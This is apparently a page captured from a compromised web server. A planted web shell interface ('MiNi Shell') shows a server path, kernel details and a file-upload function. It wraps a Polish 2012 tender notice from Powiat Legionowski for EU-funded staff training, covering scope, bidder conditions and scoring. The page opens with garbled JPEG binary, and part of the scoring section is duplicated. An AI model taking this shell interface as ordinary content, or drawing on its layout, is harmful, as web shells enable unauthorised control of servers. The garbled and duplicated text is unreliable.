JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20120309/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20120309/56031-N-2012.html

<p class="kh_header"><b>Legionowo: szkolenia dla pracowników Starostwa Powiatowego w Legionowie współfinansowane przez Unię Europejską ze środków Europejskiego Funduszu Społecznego w ramach Programu Operacyjnego Kapitał Ludzki</b><br>
<b>Numer ogłoszenia: 56031 - 2012; data zamieszczenia: 09.03.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Powiat Legionowski , ul. gen. Władysława Sikorskiego 11, 05-119 Legionowo, woj. mazowieckie, tel. 22 7840872, faks 22 7742551.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.powiat-legionowski.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> szkolenia dla pracowników Starostwa Powiatowego w Legionowie współfinansowane przez Unię Europejską ze środków Europejskiego Funduszu Społecznego w ramach Programu Operacyjnego Kapitał Ludzki.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiot zamówienia został podzielony na dwie oferty częściowe: oferta częściowa nr I: Szkolenie nr 1 SPRAWNE ZARZĄDZANIE W STAROSTWIE 1. Przedmiotem zamówienia jest przeprowadzenie szkolenia, które będzie obejmowało swoim zakresem następujące zagadnienia: sesja 1 - Budowanie i zarządzanie zespołem; sesja 2 - Planowanie i organizacja czasu pracy; sesja 3 - Komunikacja w zespole; sesja 4 - Motywowanie i coaching; sesja 5 - Twórcze rozwiązywanie konfliktów; sesja 6 - Umiejętności kierownicze,menedżerskie; dla 20 osób należących do kadry kierowniczej Starostwa Powiatowego w Legionowie; uczestnicy szkolenia zostaną podzieleni na dwie grupy po 10 osób każda; rekrutację uczestników szkolenia przeprowadzi Zamawiający. 2. Sesja szkoleniowa dla jednej grupy będzie trwała 2 dni po 8 godzin dydaktycznych dziennie (nie wliczając przerw). 3. Szkolenia będą odbywać się w czasie dwóch kolejno następujących po sobie dni roboczych. Przez dzień roboczy Zamawiający rozumie dzień od poniedziałku do piątku (bez dni ustawowo wolnych od pracy). Szkolenie nr 2 UMIEJĘTNOŚCI INTERPERSONALNE DLA EFEKTYWNEJ WSPÓŁPRACY z INTERESANTAMI i INNYMI JEDNOSTKAMI SAMORZĄDU TERYTORIALNEGO 1. Przedmiotem zamówienia jest przeprowadzenie szkolenia, które będzie obejmowało swoim zakresem następujące zagadnienia: Sesja 1-Profesjonalna obsługa klienta Sesja 2-Techniki komunikacji i wywieranie wpływu Sesja 3-Asertywna obsługa trudnego klienta Sesja 4-Komunikacja interpersonalna Sesja 5-Negocjacje; dla 30 osób odpowiedzialnych w Starostwie za bezpośredni kontakt z klientem; uczestnicy szkolenia zostaną podzieleni na dwie grupy po 15 osób każda; rekrutację uczestników szkolenia przeprowadzi Zamawiający. 2. Sesja szkoleniowa dla jednej grupy będzie trwała 2 dni po 8 godzin dydaktycznych dziennie (nie wliczając przerw). 3. Szkolenia będą odbywać się w czasie dwóch kolejno następujących po sobie dni roboczych. Przez dzień roboczy Zamawiający rozumie dzień od poniedziałku do piątku (bez dni ustawowo wolnych od pracy). Szkolenie nr 3 - PRACA ZESPOŁOWA W JEDNOSTCE SAMORZĄDU TERYTORIALNEGO 1. Przedmiotem zamówienia jest przeprowadzenie szkolenia, które będzie obejmowało swoim zakresem następujące zagadnienia: Sesja 1-Współpraca w zespole Sesja 2-Trening kreatywności Sesja 3-Zarządzanie czasem i organizacja pracy Sesja 4-Radzenie sobie ze stresem rutyną; dla 80 pracowników Starostwa; uczestnicy szkolenia zostaną podzieleni na 6 grup; 4 grupy po 14 osób i 2 grupy po 12 osób; rekrutację uczestników szkolenia przeprowadzi Zamawiający. 2. Sesja szkoleniowa dla jednej grupy będzie trwała 2 dni po 8 godzin dydaktycznych dziennie (nie wliczając przerw). 3. Szkolenia będą odbywać się w czasie dwóch kolejno następujących po sobie dni roboczych. Przez dzień roboczy Zamawiający rozumie dzień od poniedziałku do piątku (bez dni ustawowo wolnych od pracy). Oferta częściowa nr II - MARKETING i PR W JEDNOSTCE SAMORZĄDU TERYTORIALNEGO obejmuje zagdnienia: Sesja 1 -Promocja, Sesja 2-Podstawy marketingu, Sesja 3-Public Relations; dla 30 pracowników Starostwa; uczestnicy szkolenia zostaną podzieleni na 2 grupy po 15 osób każda; rekrutację uczestników szkolenia przeprowadzi Zamawiający. 2. Sesja szkoleniowa dla jednej grupy będzie trwała 2 dni po 8 godzin dydaktycznych dziennie (nie wliczając przerw). 3. Szkolenia będą odbywać się w czasie dwóch kolejno następujących po sobie dni roboczych. Przez dzień roboczy Zamawiający rozumie dzień od poniedziałku do piątku (bez dni ustawowo wolnych od pracy).</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 80.50.00.00-9.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 2.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.08.2013.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> nie jest wymagane</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>nie dotyczy</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna warunek posiadania wiedzy i doświadczenia w zakresie zapewniającym realizację zamówienia, za spełniony jeżeli Wyko­nawca wykaże że w okresie ostatnich trzech lat przed upływem terminu składania ofert (a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie), wykonał należycie (a w przypadku świadczeń okresowych lub ciągłych również wykonuje), 5 usług szkoleniowych, z których każda polegała na zorganizowaniu i przeprowadzeniu szkolenia/warsztatu o wartości nie mniejszej niż: dla Części I zamówienia 50.000,00 zł;dla Części II zamówienia 20.000,00 zł</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>nie dotyczy</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna warunek dysponowania osobami zdolnymi do wykonania zamówienioa za spełniony, jeżeli wyko­nawca wykaże, że dysponuje lub będzie dysponował:
3 osobowym zespołem trenerskim dla realizacji I części zamówienia,
2 osobowym zespołem trenerskim dla realizacji II części zamówienia.
Zamawiający uzna warunek za spełniony, jeżeli Wykonawca wykaże, że każdy z trenerów przeprowadził co najmniej 10 szkoleń z zakresu:
dla części nr I zamówienia - rozwijania umiejęt­ności interpersonalnych, w tym co najmniej pięć z tych szkoleń dla pracowników administracji publicznej,
dla części nr II zamówienia - marketingu i public relations, w tym co najmniej pięć z tych szkoleń dla pracowników administracji publicznej.
W przypadku szkoleń otwartych, za szkolenie dla pracowników administracji publicznej Zamawiający uzna szkolenie, w którym uczestniczyło co najmniej 10 pracowników administracji publicznej. 
Wykonawca wskazuje:
w ofercie na realizację I części zamówienia trzech trenerów.
w ofercie na realizację II części zamówienia dwóch trenerów.
Szkolenia poprowadzą osoby wskazane w ofercie. Poszczególne szkolenia będzie prowadziła jedna osoba</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>nie dotyczy</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>

<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg ograniczony.</p>
<p><b>IV.1.2) Przewidywana liczba wykonawców, którzy zostaną zaproszeni do udziału w postępowaniu:</b> 5.</p>
<p class="bold">Znaczenie warunków wyboru wykonawców, którzy zostaną zaproszeni do udziału w postępowaniu</p>
<p>Do składania ofert zostaną zaproszeni wykonawcy, którzy spełniają warunki udziału w postępowaniu. Jeżeli liczba wykonawców, którzy spełniają warunki udziału w postępowaniu będzie mniejsza lub równa 5, Zamawiający zaprosi do składania ofert wszystkich wykonawców bez przeprowadzania kwalifikacji punktowej wniosków. 
Jeżeli liczba wykonawców, którzy spełniają warunki udziału w postępowaniu będzie większa niż 5, wówczas Zamawiający zaprosi do składania ofert 5 wykonawców, którzy otrzymali najwyższą liczbę punktów. 

Punkty zostaną przyznane w następujący sposób: 
1. Część I zamówienia 
1) za przeprowadzone samodzielnie przez trenera szkolenia dla kadry kierowniczej z zakresu rozwijania umiejętności interpersonalnych, Zamawiający przyzna dla każdego trenera 1 pkt za każde szkolenie trwające co najmniej 16 godzin szkoleniowych; maksymalnie 10 punktów dla każdego trenera.
Ilekroć jest mowa o godzinie szkoleniowej należy przez to rozumieć 45 min. szkolenia.

2) za przeprowadzone samodzielnie przez trenera szkolenia dla pracowników administracji publicznej  z zakresu rozwijania umiejętności interpersonalnych, Zamawiający przyzna dla każdego trenera 2 pkt za każde pełne 100 godzin szkoleniowych;

3) za przeprowadzone samodzielnie przez trenera szkolenia dla osób nie wymienionych w pkt 2) z zakresu rozwijania umiejętności interpersonalnych Zamawiający przyzna dla każdego trenera 1 pkt za każde pełne 100 godzin szkoleniowych;

4) za posiadanie przez trenera certyfikatu trenerskiego co najmniej II stopnia Polskiego Towarzystwa Psychologicznego lub Stowarzyszenia Trenerów Organizacji Pozarządowych lub Szkoły Trenerów Biznesu TROP Zamawiający przyzna 20 pkt dla każdego trenera posiadającego ww. certyfikat.
5)  za posiadanie przez trenera wykształcenia wyższego magisterskiego z zakresu zarządzania lub psychologii Zamawiający przyzna 5 pkt dla każdego trenera posiadającego ww. wykształcenie. 

W przypadku uzyskania przez Wykonawców takiej samej liczby punktów o udziale w postępowaniu zdecyduje łączna wartość brutto przedstawionych przez Wykonawcę usług w Wykazie usług załączonym do wniosku o dopuszczenie do udziału w postępowaniu. 
2. Część II zamówienia 

1) za przeprowadzone samodzielnie przez trenera szkolenia dla osób będących pracownikami administracji publicznej z zakresu marketingu i public relations Zamawiający przyzna dla każdego trenera 2 pkt za każde pełne 50 godzin szkoleniowych;

2) za przeprowadzone samodzielnie przez trenera szkolenia dla osób nie wymienionych w pkt 1 z zakresu marketingu i public relations Zamawiający przyzna dla każdego trenera 1 pkt za każde pełne 50 godzin

1) za przeprowadzone samodzielnie przez trenera szkolenia dla kadry kierowniczej z zakresu rozwijania umiejętności interpersonalnych, Zamawiający przyzna dla każdego trenera 1 pkt za każde szkolenie trwające co najmniej 16 godzin szkoleniowych; maksymalnie 10 punktów dla każdego trenera.
Ilekroć jest mowa o godzinie szkoleniowej należy przez to rozumieć 45 min. szkolenia.

2) za przeprowadzone samodzielnie przez trenera szkolenia dla pracowników administracji publicznej  z zakresu rozwijania umiejętności interpersonalnych, Zamawiający przyzna dla każdego trenera 2 pkt za każde pełne 100 godzin szkoleniowych;

3) za przeprowadzone samodzielnie przez trenera szkolenia dla osób nie wymienionych w pkt 2) z zakresu rozwijania umiejętności interpersonalnych Zamawiający przyzna dla każdego trenera 1 pkt za każde pełne 100 godzin szkoleniowych;

4) za posiadanie przez trenera certyfikatu trenerskiego co najmniej II stopnia Polskiego Towarzystwa Psychologicznego lub Stowarzyszenia Trenerów Organizacji Pozarządowych lub Szkoły Trenerów Biznesu TROP Zamawiający przyzna 20 pkt dla każdego trenera posiadającego ww. certyfikat.
5)  za posiadanie przez trenera wykształcenia wyższego magisterskiego z zakresu zarządzania lub psychologii Zamawiający przyzna 5 pkt dla każdego trenera posiadającego ww. wykształcenie. 

W przypadku uzyskania przez Wykonawców takiej samej liczby punktów o udziale w postępowaniu zdecyduje łączna wartość brutto przedstawionych przez Wykonawcę usług w Wykazie usług załączonym do wniosku o dopuszczenie do udziału w postępowaniu. 

2. Część II zamówienia 

1) za przeprowadzone samodzielnie przez trenera szkolenia dla osób będących pracownikami administracji publicznej z zakresu marketingu i public relations Zamawiający przyzna dla każdego trenera 2 pkt za każde pełne 50 godzin szkoleniowych;

2) za przeprowadzone samodzielnie przez trenera szkolenia dla osób nie wymienionych w pkt 1 z zakresu marketingu i public relations Zamawiający przyzna dla każdego trenera 1 pkt za każde pełne 50 godzin szkoleniowych;

3) za posiadanie przez trenera certyfikatu trenerskiego co najmniej II stopnia Polskiego Towarzystwa Psychologicznego lub Stowarzyszenia Trenerów Organizacji Pozarządowych lub Szkoły Trenerów Biznesu TROP Zamawiający przyzna 20 pkt dla każdego trenera posiadającego ww. certyfikat;

4) za posiadane przez trenera doświadczenie w przygotowaniu i realizacji kampanii promocyjnych budujących wizerunek urzędu administracji publicznej lub jednostki samorządu terytorialnego lub regionu Zamawiający przyzna dla każdego trenera posiadającego ww. doświadczenie 2 pkt za każdą kampanię promocyjną; maksymalnie 10 pkt dla każdego trenera.

W przypadku uzyskania przez Wykonawców takiej samej liczby punktów o udziale w postępowaniu zdecyduje łączna wartość brutto przedstawionych przez Wykonawcę usług w Wykazie usług załączonym do wniosku o dopuszczenie do udziału w postępowaniu</p>
<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p><ul class="kh_indent_1">
<li>1 - Cena - 30</li>
<li>2 - doświadczenie trenerów - 70</li>
</ul>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1. Zmiana trenera na żądanie Zamawiającego. 
2. Zmiana terminu realizacji zamówienia.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> wniosek o dopuszczenie do udziału w postępowaniu: www.powiat-legionowski.pl zakładka przetargi<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> nie dotyczy.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 16.03.2012 godzina 12:00, miejsce: Kancelaria na parterze Starostwa Powiatowego w Legionowie ul. gen. Władysława Sikorskiego 11, 05-119 Legionowo.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Zamówienie współfinansowane przez Unię Europejską ze środków Europejskiego Funduszu Społecznego w ramach Programu Operacyjnego Kapitał Ludzki, Priorytet V Dobre rządzenie, Działanie 5.2. Wzmocnienie potencjału administracji samorządowej, Poddziałanie 5.2.1. Modernizacja zarządzania w administracji samorządowej, w związku z realizacją projektu Eurojakość w urzędzie - szkolenia kadry samorządowej powiatu legionowskiego gwarancją sprawnej i rzetelnej obsługi klienta.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> oferta częściowa nr 1.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Część I zamówienia obejmuje szkolenia:
Sprawne zarządzanie w Starostwie, 
Umiejętności interpersonalne dla efektywnej współpracy z interesantami i innymi jst, 
Praca zespołowa w jst.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.50.00.00-9.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.08.2013.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p>
<ul class="kh_indent_1">
<li>1. Cena - 30</li>
<li>2. doświadczenie trenerów - 70</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> oferta częściowa nr 2.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Część II zamówienia obejmuje szkolenie Marketing i PR w jst.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.50.00.00-9.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 28.09.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p>
<ul class="kh_indent_1">
<li>1. Cena - 30</li>
<li>2. doświadczenie trenerów - 70</li>
</ul>
</li>
</ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com